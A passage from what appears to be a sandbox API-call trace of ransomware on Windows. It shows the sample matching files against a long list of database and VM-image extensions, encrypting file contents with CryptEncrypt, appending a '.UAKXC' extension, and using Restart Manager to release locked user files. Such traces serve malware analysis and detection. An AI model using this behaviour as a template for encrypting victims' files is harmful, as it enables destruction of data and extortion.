lpSrch=".fcd") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fdb") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fic") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fmp") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fmp12") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fmpsl") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fol") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fp3") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fp4") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fp5") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fp7") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fpt") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".frm") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".gdb") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".grdb") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".gwi") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".hdb") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".his") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ib") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".idb") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ihx") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".itdb") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".itw") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".jet") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".jtx") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".kdb") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".kexi") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".kexic") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".kexis") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".lgc") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".lwx") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".maf") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".maq") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mar") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mas") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mav") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mdb") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mdf") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mpd") returned 0x0 [0141.425] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mrg") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mud") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mwb") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".myd") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ndf") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nnt") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nrmlib") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ns2") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ns3") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ns4") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nsf") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nv") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nv2") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nwdb") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nyf") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".odb") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".oqy") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".orx") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".owc") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".p96") returned 0x0 [0141.426] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".p97") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".pan") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".pdb") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".pdm") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".pnz") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".qry") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".qvd") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rbf") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rctd") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rod") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rodx") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rpd") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".rsd") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sas7bdat") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sbf") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".scx") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sdb") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sdc") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sdf") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sis") returned 0x0 [0141.427] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".spq") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sql") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sqlite") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sqlite3") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".sqlitedb") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".te") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".temx") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".tmd") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".tps") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".trc") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".trm") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".udb") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".udl") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".usr") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".v12") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vis") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vpd") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vvv") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".wdb") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".wmdb") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".wrk") returned 0x0 [0141.428] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".xdb") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".xld") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".xmlff") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".abcddb") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".abs") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".abx") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accdw") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".adn") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".db2") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".fm5") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".hjt") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".icg") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".icr") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".kdb") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".lut") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".maw") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mdn") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".mdt") returned 0x0 [0141.429] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vdi") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vhd") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmdk") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".pvm") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmem") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmsn") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmsd") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".nvram") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmx") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".raw") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".qcow2") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".subvol") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".bin") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vsv") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".avhd") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmrs") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vhdx") returned 0x0 [0141.473] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".avdx") returned 0x0 [0141.474] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".vmcx") returned 0x0 [0141.474] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".iso") returned 0x0 [0141.474] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.474] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.475] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.475] SetEndOfFile (hFile=0x6c8) returned 1 [0141.476] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.476] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x397fcc8, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fcc8*=0x100000, lpOverlapped=0x0) returned 1 [0141.517] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.517] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x397fc8c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc8c*=0x100000, lpOverlapped=0x0) returned 1 [0141.521] CloseHandle (hObject=0x6c8) returned 1 [0141.670] GetProcessHeap () returned 0xea0000 [0141.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.670] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0141.670] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".UAKXC" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.UAKXC") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.UAKXC" [0141.670] MoveFileW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.UAKXC" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.uakxc")) returned 1 [0141.671] GetProcessHeap () returned 0xea0000 [0141.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd900 | out: hHeap=0xea0000) returned 1 [0141.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0141.672] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0141.672] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0141.672] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0141.672] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2")) returned 0x26 [0141.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.673] GetLastError () returned 0x20 [0141.673] RmStartSession () returned 0x0 [0143.381] RmRegisterResources () returned 0x0 [0143.382] RmGetList () returned 0xea [0143.700] GetProcessHeap () returned 0xea0000 [0143.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xefc020 [0143.700] RmGetList () returned 0x0 [0144.051] GetCurrentProcess () returned 0xffffffff [0144.051] GetProcessId (Process=0xffffffff) returned 0xaec [0144.051] RmShutdown () returned 0x15e [0144.335] GetProcessHeap () returned 0xea0000 [0144.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefc020 | out: hHeap=0xea0000) returned 1 [0144.335] RmEndSession () returned 0x0 [0144.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec630 | out: hHeap=0xea0000) returned 1 [0144.337] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b28 | out: hHeap=0xea0000) returned 1 [0144.337] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0144.337] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0144.337] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0144.337] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x26 [0144.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 